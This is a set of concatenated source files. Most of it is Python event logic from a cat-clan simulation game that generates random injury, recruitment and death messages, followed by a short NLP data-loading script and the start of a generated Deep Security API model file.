river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n\n if scar_text:\n game.cur_events_list.append(choice(scar_text))\n\n def invite_new_cats(self, cat):\n chance = 100\n if self.living_cats < 10:\n chance = 100\n elif self.living_cats > 50:\n chance = 700\n elif self.living_cats > 30:\n chance = 300\n if randint(1, chance\n ) == 1 and cat.age != 'kitten' and cat.age != 'adolescent':\n self.new_cat_invited = True\n name = str(cat.name)\n type_of_new_cat = choice([1, 2, 3, 4, 5, 6, 7])\n if type_of_new_cat == 1:\n kit = Cat(moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, kit))\n relationships.append(Relationship(kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n kit_text = [\n f'{name} finds an abandoned kit and names them {str(kit.name)}',\n f'A loner brings their kit named {str(kit.name.prefix)} to the clan, stating they no longer can care for them'\n ]\n game.cur_events_list.append(choice(kit_text))\n self.check_age(kit)\n\n elif type_of_new_cat == 2:\n self._extracted_from_invite_new_cats_19(name)\n\n elif type_of_new_cat == 3:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n loner.skill = 'formerly a loner'\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner who joins the clan',\n f'A loner says that they are interested in clan life and joins the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The loner changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 4:\n warrior = Cat(status='warrior', moons=randint(12, 150))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(\n the_cat, warrior))\n relationships.append(Relationship(warrior, the_cat))\n warrior.relationships = relationships\n game.clan.add_cat(warrior)\n warrior_text = []\n if len(game.clan.all_clans) > 0:\n warrior_text.extend([\n f'{name} finds a warrior from {str(choice(game.clan.all_clans).name)}Clan named {str(warrior.name)} who asks to join the clan',\n f'An injured warrior from {str(choice(game.clan.all_clans).name)}Clan asks to join in exchange for healing'\n ])\n else:\n warrior_text.extend([\n f'{name} finds a warrior from a different clan named {str(warrior.name)} who asks to join the clan'\n ])\n game.cur_events_list.append(choice(warrior_text))\n self.check_age(warrior)\n\n elif type_of_new_cat == 5:\n self._extracted_from_invite_new_cats_47(name)\n elif 
type_of_new_cat == 6:\n loner = Cat(status='warrior', moons=randint(12, 120))\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {choice(names.loner_names)} who wants to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n 'The kittypet changes their name to ' + str(loner.name))\n self.check_age(loner)\n\n elif type_of_new_cat == 7:\n parent1 = cat.name\n kits = choice([1, 1, 2, 2, 2, 3])\n for kit in range(kits):\n if cat.mate is not None:\n kit = Cat(parent1=cat.ID, parent2=cat.mate, moons=0)\n game.clan.add_cat(kit)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID in [kit.parent1, kit.parent2]:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n else:\n kit = Cat(parent1=cat.ID, moons=0)\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n if the_cat.ID == kit.parent1:\n the_cat.relationships.append(\n Relationship(the_cat, kit, False, True))\n relationships.append(\n Relationship(kit, the_cat, False, True))\n else:\n the_cat.relationships.append(\n Relationship(the_cat, kit))\n relationships.append(Relationship(\n kit, the_cat))\n kit.relationships = relationships\n game.clan.add_cat(kit)\n if len(game.clan.all_clans) > 0:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them',\n f'A loner leaves their litter to the clan. {str(parent1)} decides to adopt them as their own',\n f'A {str(choice(game.clan.all_clans).name)}Clan queen decides to leave their litter with you. {str(parent1)} takes them as their own'\n ])\n else:\n Akit_text = ([\n f'{parent1} finds an abandoned litter and decides to adopt them as their own',\n f'A loner leaves their litter to the clan. 
{str(parent1)} decides to adopt them as their own'\n ])\n game.cur_events_list.append(choice(Akit_text))\n self.check_age(kit)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_59(self, loner):\n loner.skill = 'formerly a kittypet'\n if choice([1, 2]) == 1:\n loner.specialty2 = choice(scars3)\n game.clan.add_cat(loner)\n self.check_age(loner)\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_47(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n self._extracted_from_invite_new_cats_59(loner)\n loner_text = [\n f'{name} finds a kittypet named {str(loner_name)} who wants to join the clan',\n f'A kittypet named {str(loner_name)} stops {name} and asks to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n\n # TODO Rename this here and in `invite_new_cats`\n def _extracted_from_invite_new_cats_19(self, name):\n loner_name = choice(names.loner_names)\n loner = Cat(prefix=loner_name,\n gender=choice(['female', 'male']),\n status='warrior',\n moons=randint(12, 120),\n suffix='')\n loner.skill = 'formerly a loner'\n #create and update relationships\n relationships = []\n for cat_id in game.clan.clan_cats:\n the_cat = cat_class.all_cats.get(cat_id)\n if the_cat.dead or the_cat.exiled:\n continue\n the_cat.relationships.append(Relationship(the_cat, loner))\n relationships.append(Relationship(loner, the_cat))\n loner.relationships = relationships\n game.clan.add_cat(loner)\n loner_text = [\n f'{name} finds a loner named {str(loner.name)} who joins the clan',\n f'A loner named {str(loner.name)} waits on the border for a patrol, asking to join the clan'\n ]\n game.cur_events_list.append(choice(loner_text))\n game.cur_events_list.append(\n str(loner_name) + ' decides to keep their name')\n self.check_age(loner)\n\n def other_interactions(self, cat):\n if randint(1, 100) != 1:\n return\n interactions = []\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n name = str(cat.name)\n other_name = str(other_cat.name)\n if cat.status in ['warrior', 'deputy'] and randint(\n 1, 15) == 1 and game.settings.get('retirement') is True:\n game.cur_events_list.append(\n f'{name} retires to the elders den after injuries sustained defending {other_name}'\n )\n if cat.status == 'deputy':\n game.clan.deputy = None\n\n cat.status_change('elder')\n return\n if cat.status == 'kitten' and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by {other_name}'\n ])\n elif cat.status in ['apprentice', 'medicine cat apprentice'] and other_cat.status != 'kitten':\n interactions.extend([\n f'{name} is scolded after sneaking out of camp',\n f'{name} falls into a river but is saved by 
{other_name}',\n name +\n \" accidentally trespasses onto another clan\\'s territory\"\n ])\n if other_cat.status == 'apprentice':\n interactions.append(\n f'{name} sneaks out of camp with {other_name}')\n elif cat.status == 'warrior':\n interactions.extend([\n name + \" is caught outside of the Clan\\'s territory\",\n f'{name} is caught breaking the Warrior Code',\n f'{name} went missing for a few days',\n f'{name} believes they are a part of the new prophecy'\n ])\n elif cat.status == 'medicine cat':\n interactions.extend([\n f'{name} learns of a new prophecy',\n f'{name} is worried about an outbreak of greencough',\n f'{name} is worried about how low their herb stores has gotten',\n f'{name} visits the other medicine cats'\n ])\n elif cat.status == 'deputy':\n interactions.extend([\n f'{name} thinks about retiring',\n f'{name} travels to the other clans to bring them an important message'\n ])\n elif cat.status == 'leader':\n if game.clan.leader_lives <= 5:\n interactions.extend([\n f'{name} thinks about retiring',\n name + \" confesses they don\\'t have many lives left\"\n ])\n if other_cat.status not in [\n 'kitten', 'apprentice', 'medicine cat apprentice'\n ]:\n interactions.append(\n f'{name} confesses to {other_name} that the responsibility of leadership is crushing them'\n )\n elif other_cat.status == 'apprentice':\n interactions.append(f'{name} assesses {other_name}' +\n \"\\'s progress\")\n interactions.extend([\n f'{name} calls a clan meeting to give an important announcement'\n ])\n elif cat.status == 'elder':\n interactions.extend(\n [f'{name} is brought back to camp after wandering off'])\n if cat.age == other_cat.age:\n interactions.extend([\n f'{name} tries to convince {other_name} to run away together'\n ])\n\n if interactions:\n game.cur_events_list.append(choice(interactions))\n\n def handle_deaths(self, cat):\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n #Leader lost a life EVENTS\n if randint(1, 100) == 1:\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.status == 'leader' or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n if cat.status == 'leader':\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' lost a life after falling into a river',\n name + ' lost a life due to greencough',\n name + ' lost a life due to whitecough',\n 'Lightning fell in camp and ' + name + ' lost a life',\n name + ' was mortally wounded by a fox', name +\n ' lost a life to a dog', name + ' lost a life to a badger',\n name + ' lost a life to a hawk',\n name + ' lost a life due to yellowcough',\n name + ' lost a life while fighting off a rogue',\n name + ' lost a life to an eagle', name +\n ' was grabbed and dropped by an eagle, losing a life',\n name + ' was grabbed and dropped by a hawk, losing a life',\n name + ' lost a life after being swept away by a flood',\n name + ' lost a life after falling off a tree',\n name + ' was bit by a venomous spider and lost a life',\n name + ' was bit by a venomous snake and lost a life',\n name + ' ate poisoned fresh-kill and lost a life', name +\n ' failed to interpret a warning sign from StarClan and lost a life as a result',\n name + ' lost a life defending ' + other_name +\n ' from a dog', name + ' lost a life defending ' +\n other_name + ' from a 
badger', name +\n ' lost a life defending ' + other_name + ' from a fox',\n name + ' lost a life defending ' + other_name +\n ' from a hawk', name + ' lost a life defending ' +\n other_name + ' from an eagle',\n name + ' lost a life while saving ' + other_name +\n ' from drowning', name + ' lost a life while saving ' +\n other_name + ' from a monster',\n name + ' was pushed under a monster and lost a life',\n name + ' lost a life after saving ' + other_name + ' from a snake'\n ]\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a life defending the kits from ' +\n choice(game.clan.all_clans).name + 'Clan warriors',\n name + ' lost a life defending ' + other_name +\n ' from ' + choice(game.clan.all_clans).name +\n 'Clan warriors', name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan apprentice',\n name + ' lost a life to a ' +\n choice(game.clan.all_clans).name + 'Clan warrior'\n ])\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n #Several/All Lives loss\n elif randint(1,200) == 1 and cat.status == 'leader': \n name = str(cat.name)\n allorsome = randint(1, 10)\n if cat.status == 'leader':\n if allorsome == 1:\n cause_of_death = [\n name +\n ' was brutally attacked by a rogue and lost all of their lives',\n name +\n ' was mauled by dogs and lost all of their lives',\n name +\n ' was carried off by an eagle, never to be seen again',\n name +\n ' was carried off by a hawk, never to be seen again',\n name + ' was taken by twolegs, never to be seen again',\n name +\n ' fell into a river and was swept away by the current, never to be seen again',\n name +\n ' was burnt alive while trying to save their clanmates from a fire'\n ]\n if self.at_war and len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' was brutally murdered by a ' +\n choice(game.clan.all_clans).name +\n 'Clan warrior and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan deputy and lost all of their lives',\n name + ' was brutally murdered by the ' +\n choice(game.clan.all_clans).name +\n 'Clan leader and lost all of their lives'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was buried alive in an avalanche',\n name + ' was buried alive by a landslide', name +\n ' was pushed off a cliff with sharp rocks at the bottom',\n name +\n ' accidentally fell off a cliff with sharp rocks at the bottom'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name +\n ' was washed out to sea and was never seen again',\n name +\n ' was lost to sea while saving a clanmate from drowning'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name +\n ' fell into a sinkhole and was never seen again',\n name +\n ' fell into a hidden burrow and was buried alive',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n game.clan.leader_lives -= 10\n else:\n lostlives = choice([2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 6])\n cause_of_death = [\n name + ' lost ' + str(lostlives) +\n ' lives due to greencough', name + ' lost ' +\n str(lostlives) + ' lives due to whitecough',\n name + ' lost ' + str(lostlives) +\n ' lives due to yellowcough', name + ' lost ' +\n str(lostlives) + ' lives due to an illness',\n name + ' lost ' + str(lostlives) +\n ' lives due to an infection'\n ]\n game.clan.leader_lives = game.clan.leader_lives - lostlives\n self.dies(cat)\n 
game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 400) == 1:\n name = str(cat.name)\n cause_of_death = [\n name + ' was murdered', name + ' died of greencough',\n 'A tree fell in camp and killed ' + name,\n name + ' was found dead near a fox den',\n name + ' was bitten by a snake and died'\n ]\n if clan_has_kits == True and cat.status != 'kitten':\n cause_of_death.extend([\n name + ' was bitten by a snake while saving a kit and died'\n ])\n if cat.status == 'kitten':\n cause_of_death.extend([\n name + ' fell into a river and drowned',\n name + ' was taken by a hawk',\n name + ' grew weak as the days passed and died',\n name + ' was killed after sneaking out of camp',\n name + ' died after accidentally eating deathberries',\n name +\n ' was killed in their sleep after a snake snuck into camp'\n ])\n if game.clan.current_season == 'Leaf-bare':\n cause_of_death.extend([\n name + ' was found dead in the snow',\n name + ' froze to death in a harsh snowstorm', name +\n ' disappeared from the nursery and was found dead in the territory',\n name +\n ' was playing on the ice when the ice cracked and they drowned'\n ])\n if game.clan.current_season == 'Greenleaf':\n cause_of_death.extend([name + ' died to overheating'])\n elif cat.status == 'apprentice':\n cause_of_death.extend([\n name + ' died in a training accident', name +\n ' was killed by enemy warriors after accidentally wandering over the border',\n name + ' went missing and was found dead',\n name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed to death by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n elif cat.status == 'warrior' or cat.status == 'deputy':\n if len(game.clan.all_clans) > 0:\n cause_of_death.append(name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border')\n cause_of_death.extend([\n name + ' died from infected wounds',\n name + ' went missing and was found dead'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' was killed by enemy ' +\n self.enemy_clan + ' warriors',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors', name + ' died in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' was crushed by an avalanche',\n name + ' fell from a cliff and died'\n ])\n if game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and drowned',\n name + ' was poisoned by a sea creature and died'\n ])\n if game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and died', name +\n ' fell into a hidden burrow and could not get out',\n name +\n ' was buried alive when a burrow collapsed on them'\n ])\n #Leader loses a life\n elif cat.status == 'leader':\n cause_of_death = []\n if len(game.clan.all_clans) > 0:\n cause_of_death.extend([\n name + ' lost a live to greencough',\n 'A tree fell in camp and ' + name + ' lost a life'\n ])\n cause_of_death.extend([\n name + ' was found dead near the ' +\n choice(game.clan.all_clans).name +\n 'Clan border mortally injured'\n ])\n cause_of_death.extend([\n name + ' lost a life from infected wounds', name +\n ' went missing and was later found 
mortally wounded'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' was killed by enemy ' + self.enemy_clan +\n ' warriors and lost a life',\n name + ' lost a life in a border skirmish'\n ])\n if game.clan.biome == \"Mountainous\":\n cause_of_death.extend([\n name + ' lost a life in an avalanche',\n name + ' lost a life in a landslide',\n name + ' was pushed off a cliff and lost a life',\n name + ' accidentally fell off a cliff and lost a life'\n ])\n elif game.clan.biome == \"Beach\":\n cause_of_death.extend([\n name + ' was washed out to sea and lost a life', name +\n ' was poisoned by a sea creature and lost a life'\n ])\n elif game.clan.biome == \"Plains\":\n cause_of_death.extend([\n name + ' fell into a sinkhole and lost a life',\n name + ' fell into a hidden burrow and lost a life',\n name + ' lost a life when a burrow collapsed on them'\n ])\n elif self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy and lost a life',\n name + ' was killed by the ' + self.enemy_clan +\n ' leader and lost a life'\n ])\n\n elif cat.status == 'medicine cat' or cat.status == 'medicine cat apprentice':\n cause_of_death.extend([\n 'The herb stores were damaged and ' + name +\n ' was murdered by an enemy warrior'\n ])\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by a ' + self.enemy_clan +\n ' warrior while pulling an injured cat out of the battlefield'\n ])\n if cat.status == 'deputy':\n if self.at_war:\n cause_of_death.extend([\n name + ' was killed by the ' + self.enemy_clan +\n ' deputy', name + ' was killed by the ' +\n self.enemy_clan + ' leader'\n ])\n\n if cat.status == 'leader':\n game.clan.leader_lives -= 1\n self.dies(cat)\n\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' + str(cat.moons) +\n ' moons old')\n\n elif randint(1, 500) == 1: # multiple deaths\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n cause_of_death = [\n name + ' and ' + other_name + ' die of greencough',\n name + ' and ' + other_name + ' die of yellowcough',\n name + ' and ' + other_name + ' die of whitecough',\n name + ' and ' + other_name + ' die from eating poisoned prey'\n ]\n if cat.status == ['kitten', 'leader'] or other_cat.status == ['kitten', 'leader']:\n cause_of_death.extend([\n name + ' and ' + other_name +\n ' are killed in a border skirmish',\n name + ' and ' + other_name +\n ' are killed in a battle against a gang of rogues'\n ])\n if cat.mate is not None and cat.age == other_cat.age and other_cat.mate is None:\n if cat.status == 'leader':\n game.clan.leader_lives -= 10\n game.cur_events_list.append(\n name + ' is killed by ' + other_name +\n ' in an argument over ' +\n str(cat_class.all_cats.get(cat.mate).name))\n self.dies(cat)\n return\n if cat.status == 'leader' or other_cat.status == 'leader':\n game.clan.leader_lives -= 1\n game.cur_events_list.append(choice(cause_of_death) + ' and the leader lost a life')\n else:\n game.cur_events_list.append(choice(cause_of_death))\n self.dies(cat)\n self.dies(other_cat)\n\n elif randint(1, 80) == 1: #Death with Personalities\n 
murder_chance = 20\n name = str(cat.name)\n countdown = int(len(cat_class.all_cats) / 3)\n other_cat = choice(list(cat_class.all_cats.values()))\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n if cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sneaky',\n 'sadistic', 'greedy', 'selfish'\n ] and other_cat.status in ['leader', 'deputy']:\n if cat.status == 'deputy' and other_cat.status == 'leader':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood to take their place',\n name + ' murdered ' + other_name +\n ' to take their place and made it look like an accident'\n ]\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status == 'warrior':\n if randint(1, murder_chance - 15) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name +\n ' in cold blood '\n 'in hopes of taking their place',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental '\n 'in hopes of taking their place'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' murdered ' + other_name + ' in cold blood',\n name + ' murdered ' + other_name +\n ' in cold blood and made it look accidental'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n elif cat.status in [\n 'medicine cat', 'medicine cat apprentice'\n ] and cat.trait in ['bloodthirsty', 'vengeful', 'sadistic']:\n if randint(1, murder_chance) == 1:\n cause_of_death = [\n name + ' killed ' + other_name +\n ' by giving them deathberries', name + ' killed ' +\n other_name + ' by giving them foxglove seeds',\n name + ' killed ' + other_name +\n ' by giving them nightshade berries',\n name + ' killed ' + other_name +\n ' by giving them water hemlock',\n name + ' killed ' + other_name +\n ' by consciously giving them the wrong herbs'\n ]\n if other_cat == 'leader':\n game.clan.leader_lives -= 10\n self.dies(other_cat)\n game.cur_events_list.append(\n choice(cause_of_death) + ' at ' +\n str(other_cat.moons) + ' moons old')\n\n elif cat.moons > randint(150, 200): # extra chance of cat dying to age\n if choice([1, 2, 3, 4, 5, 6]) == 1:\n if cat.status != 'leader':\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n else:\n game.clan.leader_lives -= 1\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) +\n ' has lost a life due to their old age at ' +\n str(cat.moons) + ' moons old')\n if cat.status == 'leader' and cat.moons > 269:\n game.clan.leader_lives -= 10\n self.dies(cat)\n game.cur_events_list.append(\n str(cat.name) + ' has passed due to their old age at ' +\n str(cat.moons) + ' moons old')\n\n if game.settings.get('disasters') is True:\n alive_count = 0\n alive_cats = []\n for cat in list(cat_class.all_cats.values()):\n if not cat.dead and not cat.exiled and cat.status != 'leader':\n 
alive_count += 1\n alive_cats.append(cat)\n if alive_count > 10:\n chance = int(alive_count / 10)\n if randint(chance, 1000) == 999:\n disaster = []\n dead_cats = random.sample(alive_cats, 5)\n name1 = str(dead_cats[0].name)\n name2 = str(dead_cats[1].name)\n name3 = str(dead_cats[2].name)\n name4 = str(dead_cats[3].name)\n name5 = str(dead_cats[4].name)\n disaster.extend([\n ' drown after the camp becomes flooded',\n ' are killed in a battle against ' +\n choice(names.normal_prefixes) + 'Clan',\n ' are killed after a fire rages through the camp',\n ' are killed in an ambush by a group of rogues',\n ' go missing in the night',\n ' are killed after a badger attack',\n ' die to a greencough outbreak',\n ' are taken away by twolegs',\n ' eat poisoned freshkill and die'\n ])\n if game.clan.current_season == 'Leaf-bare':\n disaster.extend([\n ' die after freezing from a snowstorm',\n ' starve to death when no prey is found'\n ])\n elif game.clan.current_season == 'Greenleaf':\n disaster.extend([\n ' die after overheating',\n ' die after the water dries up from drought'\n ])\n\n game.cur_events_list.append(name1 + ', ' + name2 + ', ' +\n name3 + ', ' + name4 +\n ', and ' + name5 +\n choice(disaster))\n for cat in dead_cats:\n self.dies(cat)\n\n def dies(self, cat): # This function is called every time a cat dies\n if cat.status == 'leader' and game.clan.leader_lives > 0:\n return\n elif cat.status == 'leader' and game.clan.leader_lives <= 0:\n cat.dead = True\n game.clan.leader_lives = 0\n else:\n cat.dead = True\n\n if cat.mate != None:\n cat.mate = None\n if type(cat.mate) == str:\n mate = cat_class.all_cats.get(cat.mate)\n mate.mate = None\n elif type(cat.mate) == Cat:\n cat.mate.mate = None\n\n for app in cat.apprentice.copy():\n app.update_mentor()\n cat.update_mentor()\n game.clan.add_to_starclan(cat)\n\n def check_age(self, cat):\n if 0 <= cat.moons <= 5:\n cat.age = 'kitten'\n elif 6 <= cat.moons <= 11:\n cat.age = 'adolescent'\n elif 12 <= cat.moons <= 47:\n cat.age = 'young adult'\n elif 48 <= cat.moons <= 95:\n cat.age = 'adult'\n elif 96 <= cat.moons <= 119:\n cat.age = 'senior adult'\n else:\n cat.age = 'elder'\n\nevents_class = Events()","repo_name":"Clangen-Web/clangen-web.github.io","sub_path":"scripts/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":76705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71600804647","text":"# -*- coding:utf-8 -*-\n\nimport codecs\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_max_length(input_file):\n left_length = []\n right_length = []\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n left_data = data[0].split()\n left_length.append(len(left_data))\n right_data = data[1].split()\n right_length.append(len(right_data))\n return max(max(left_length), max(right_length))\n\n\ndef get_vocab(input_file):\n vocab = set('pad')\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n for char in data[0].split():\n vocab.add(char)\n for char in data[1].split():\n vocab.add(char)\n vocab = {word:(i+1) for i, word in enumerate(vocab)}\n vocab['pad'] = 0\n return vocab\n\ndef padding_sentence(data, max_length, vocab):\n sentence = [vocab[word] for word in data.split()]\n if len(sentence) < max_length:\n sentence = sentence + [vocab['pad']]*(max_length-len(sentence))\n elif len(sentence) > max_length:\n 
sentence = sentence[:max_length]\n return sentence\n\ndef load_data(input_file):\n max_length = get_max_length(input_file)\n vocab = get_vocab(input_file)\n left_data = []\n right_data = []\n label = []\n with codecs.open(input_file, 'r', encoding='utf_8_sig') as rfile:\n for line in rfile.readlines():\n data = line.strip().split('\\t')\n\n left_data.append(padding_sentence(data[0], max_length, vocab))\n right_data.append(padding_sentence(data[1], max_length, vocab))\n if int(data[2]) == 0: label.append([1, 0])\n else: label.append([0, 1])\n x_left_data = np.array(left_data)\n x_right_data = np.array(right_data)\n y_label = np.array(label)\n return x_left_data, x_right_data, y_label, vocab, max_length\n\nif __name__ == '__main__':\n # x_left_data, x_right_data, y_label, vocab, max_length = load_data('data/atec_train_data.txt')\n # print(x_left_data[0])\n # print(y_label[0])\n import tensorflow as tf\n dbpedia = tf.contrib.learn.datasets.load_dataset('dbpedia')\n\n\n\n","repo_name":"zhongbin1/DeepMatching","sub_path":"data_helps.py","file_name":"data_helps.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"34423576195","text":"# coding: utf-8\r\n\r\n\"\"\"\r\n Trend Micro Deep Security API\r\n\r\n Copyright 2018 - 2020 Trend Micro Incorporated.
    Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501\r\n\r\n OpenAPI spec version: 20.0.186\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\nfrom deepsecurity.models.account_rights import AccountRights # noqa: F401,E501\r\nfrom deepsecurity.models.fix_rights import FixRights # noqa: F401,E501\r\nfrom deepsecurity.models.heap_rights import HeapRights # noqa: F401,E501\r\nfrom deepsecurity.models.license_rate_rights import LicenseRateRights # noqa: F401,E501\r\nfrom deepsecurity.models.network_security_rights import NetworkSecurityRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_rights import QueryRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_traceback_rights import QueryTracebackRights # noqa: F401,E501\r\nfrom deepsecurity.models.server_log_rights import ServerLogRights # noqa: F401,E501\r\nfrom deepsecurity.models.stack_trace_rights import StackTraceRights # 